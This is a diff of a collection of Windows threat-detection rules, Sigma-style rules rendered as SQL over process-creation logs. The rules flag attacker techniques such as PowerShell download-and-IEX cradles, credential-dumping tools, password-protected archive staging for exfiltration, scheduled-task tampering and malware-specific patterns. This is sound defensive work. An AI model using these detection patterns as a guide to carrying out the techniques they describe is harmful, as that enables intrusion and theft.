"proc_creation_win_java_susp_child_process_2.yml" + "filename": "proc_creation_win_reg_software_discovery.yml" }, { - "title": "Zip A Folder With PowerShell For Staging In Temp", - "id": "85a8e5ba-bd03-4bfb-bbfa-a4409a8f8b98", + "title": "InfDefaultInstall.exe .inf Execution", + "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", "status": "test", - "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1074.001" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Compress-Archive %' ESCAPE '\\' AND CommandLine LIKE '% -Path %' ESCAPE '\\' AND CommandLine LIKE '% -DestinationPath %' ESCAPE '\\' AND CommandLine LIKE '%$env:TEMP\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_zip_compress.yml" + "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" }, { - "title": "Verclsid.exe Runs COM Object", - "id": "d06be4b9-8045-428b-a567-740a26d9db25", + "title": "Potential Suspicious Registry File Imported Via Reg.EXE", + "id": "62e0298b-e994-4189-bc87-bc699aa62d97", + "status": "experimental", + "description": "Detects the import of '.reg' files from suspicious paths using the 'reg.exe' utility", + "author": "frack113, Nasreddine Bencherchali", + "tags": [ + "attack.t1112", + "attack.defense_evasion" + ], + "falsepositives": [ + "Legitimate import of keys" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '% import %' ESCAPE '\\' AND (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_reg_import_from_suspicious_paths.yml" + }, + { + "title": "Potential Defense Evasion Via Binary Rename", + "id": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "status": "test", - "description": "Detects when verclsid.exe is used to run COM object via GUID", - "author": "Victor Sergeev, oscd.community", + "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", + "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1218" + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR OriginalFileName = 'verclsid.exe') AND (CommandLine LIKE '%/S%' ESCAPE '\\' AND CommandLine LIKE '%/C%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND OriginalFileName IN ('Cmd.Exe', 'CONHOST.EXE', '7z.exe', 'WinRAR.exe', 'wevtutil.exe', 'net.exe', 'net1.exe', 'netsh.exe', 'InstallUtil.exe') AND NOT ((NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WinRAR.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_verclsid_runs_com.yml" + "filename": "proc_creation_win_renamed_binary.yml" }, { - "title": "Suspicious Schtasks Schedule Type With High Privileges", - "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "title": "PowerShell Web Download and Execution", + "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", "status": "experimental", - "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Some installers were seen using this method of creation unfortunately. Filter them in your environment" + "Scripts or tools that download files and execute them" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_schedule_type_system.yml" + "filename": "proc_creation_win_powershell_download_iex.yml" }, { - "title": "Potential Privilege Escalation To LOCAL SYSTEM", - "id": "207b0396-3689-42d9-8399-4222658efc99", + "title": "ImagingDevices Unusual Parent/Child Processes", + "id": "f11f2808-adb4-46c0-802a-8660db50fa99", "status": "experimental", - "description": "Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects unusual parent or children of the ImagingDevices.exe (Windows Contacts) process as seen being used with Bumblebee activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Weird admins that rename their tools", - "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% /s -i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s /i cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -i /s cmd%' ESCAPE '\\' OR CommandLine LIKE '% /i -s cmd%' ESCAPE '\\' OR CommandLine LIKE '% -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /s -i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s /i pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -i /s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% /i -s pwsh%' ESCAPE '\\' OR CommandLine LIKE '% -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% /s -i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -s /i powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i -s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% -i /s powershell%' ESCAPE '\\' OR CommandLine LIKE '% /i -s powershell%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%paexec%' ESCAPE '\\' OR CommandLine LIKE '%PsExec%' ESCAPE '\\' OR CommandLine LIKE '%accepteula%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\') AND NewProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\') OR ParentProcessName LIKE '%\\\\ImagingDevices.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sysinternals_susp_psexec_paexec_flags_.yml" + "filename": "proc_creation_win_imagingdevices_unusual_parents.yml" }, { - "title": "PowerShell Web Download and Execution", - "id": "85b0b087-eddf-4a2b-b033-d771fa2b9775", - "status": "experimental", - "description": "Detects suspicious ways to download files or content and execute them using PowerShell Invoke-Expression", + "title": "HackTool - SecurityXploded Execution", + "id": "7679d464-4f74-45e2-9e01-ac66c5eb041a", + "status": "stable", + "description": "Detects the execution of SecurityXploded Tools", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1555" + ], + "falsepositives": [ + "Unlikely" + ], + "level": "critical", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Company = 'SecurityXploded' OR NewProcessName LIKE '%PasswordDump.exe' ESCAPE '\\' OR OriginalFileName LIKE '%PasswordDump.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_hktl_secutyxploded.yml" + }, + { + "title": "Suspicious Modification Of Scheduled Tasks", + "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "status": "experimental", + "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059" + "attack.t1053.005" ], "falsepositives": [ - "Scripts or tools that download files and execute them" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\') AND (CommandLine LIKE '%IEX(%' ESCAPE '\\' OR CommandLine LIKE '%IEX (%' ESCAPE '\\' OR CommandLine LIKE '%I`EX%' ESCAPE '\\' OR CommandLine LIKE '%IE`X%' ESCAPE '\\' OR CommandLine LIKE '%I`E`X%' ESCAPE '\\' OR CommandLine LIKE '%| IEX%' ESCAPE '\\' OR CommandLine LIKE '%|IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%;iex $%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_download_iex.yml" + "filename": "proc_creation_win_schtasks_change.yml" }, { - "title": "PUA - DIT Snapshot Viewer", - "id": "d3b70aad-097e-409c-9df2-450f80dc476b", + "title": "Non-privileged Usage of Reg or Powershell", + "id": "8f02c935-effe-45b3-8fc9-ef8696a9e41d", "status": "test", - "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", - "author": "Furkan Caliskan (@caliskanfurkan_)", + "description": "Search for usage of reg or Powershell by non-privileged users to modify service configuration in registry", + "author": "Teymur Kheirkhabarov (idea), Ryan Plas (rule), oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate admin usage" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%reg %' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%set-itemproperty%' ESCAPE '\\' OR CommandLine LIKE '% sp %' ESCAPE '\\' OR CommandLine LIKE '%new-itemproperty%' ESCAPE '\\')) AND (IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%Services%' ESCAPE '\\' AND (CommandLine LIKE '%ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%ServiceDLL%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_ditsnap.yml" + "filename": "proc_creation_win_susp_non_priv_reg_or_ps.yml" }, { - "title": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE", - "id": "48917adc-a28e-4f5d-b729-11e75da8941f", + "title": "DllUnregisterServer Function Call Via Msiexec.EXE", + "id": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "status": "experimental", - "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exlcusions for folders within AppData and ProgramData.", + "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1218.007" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' AND (CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Exclusions\\\\Paths%' ESCAPE '\\' OR CommandLine LIKE '%SOFTWARE\\\\Microsoft\\\\Microsoft Antimalware\\\\Exclusions\\\\Paths%' ESCAPE '\\') AND CommandLine LIKE '%ADD %' ESCAPE '\\' AND CommandLine LIKE '%/t %' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD %' ESCAPE '\\' AND CommandLine LIKE '%/v %' ESCAPE '\\' AND CommandLine LIKE '%/d %' ESCAPE '\\' AND CommandLine LIKE '%0%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\msiexec.exe' ESCAPE '\\') AND (CommandLine LIKE '% /z %' ESCAPE '\\' OR CommandLine LIKE '% -z %' ESCAPE '\\') AND CommandLine LIKE '%.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_msiexec_dll.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious Outlook Child Process", + "id": "208748f7-881d-47ac-a29c-07ea84bf691d", + "status": "test", + "description": "Detects a suspicious process spawning from an Outlook process.", + "author": "Michael Haag, Florian Roth (Nextron Systems), Markus Neis, Elastic, FPT.EagleEye Team", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1204.002" + ], + "falsepositives": [ + "Unknown" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\OUTLOOK.EXE' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\'))" + ], + "filename": "proc_creation_win_office_outlook_susp_child_processes.yml" + }, + { + "title": "Winnti Malware HK University Campaign", + "id": "3121461b-5aa0-4a41-b910-66d25524edbb", + "status": "test", + "description": "Detects specific process characteristics of Winnti malware noticed in Dec/Jan 2020 in a campaign against Honk Kong universities", + "author": "Florian Roth (Nextron Systems), Markus Neis", + "tags": [ + "attack.defense_evasion", + "attack.t1574.002", + "attack.g0044" ], "falsepositives": [ "Unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((ParentProcessName LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\hpqhvind.exe%' ESCAPE '\\') AND NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR (ParentProcessName LIKE '%\\\\Test.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\wmplayer.exe' ESCAPE '\\') OR NewProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\CLR\\\\CLR.exe' ESCAPE '\\' OR (ParentProcessName LIKE 'C:\\\\ProgramData\\\\DRM\\\\Windows%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\SearchFilterHost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_apt_winnti_mal_hk_jan20.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", + "title": "PUA - CsExec Execution", + "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.resource_development", + "attack.t1587.001", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_pua_csexec.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", + "id": "9fbf5927-5261-4284-a71d-f681029ea574", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Legitimate activity is expected since compressing files with a password is common." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_7zip_password_compression.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Potential Product Reconnaissance Via Wmic.EXE", + "id": "15434e33-5027-4914-88d5-3d4145ec25a9", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects the execution of WMIC in order to get a list of firewall and antivirus products", + "author": "Nasreddine Bencherchali", + "tags": [ + "attack.execution", + "attack.t1047" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND CommandLine LIKE '%Product%' ESCAPE '\\')" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_wmic_recon_product.yml" }, { - "title": "Detect Virtualbox Driver Installation OR Starting Of VMs", - "id": "bab049ca-7471-4828-9024-38279a4c04da", + "title": "Gpresult Display Group Policy Information", + "id": "e56d3073-83ff-4021-90fe-c658e0709e72", "status": "experimental", - "description": "Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.", - "author": "Janantha Marasinghe", + "description": "Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1564.006", - "attack.t1564" + "attack.discovery", + "attack.t1615" ], "falsepositives": [ - "This may have false positives on hosts where Virtualbox is legitimately being used for operations" + "Unknown" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%VBoxRT.dll,RTR3Init%' ESCAPE '\\' OR CommandLine LIKE '%VBoxC.dll%' ESCAPE '\\' OR CommandLine LIKE 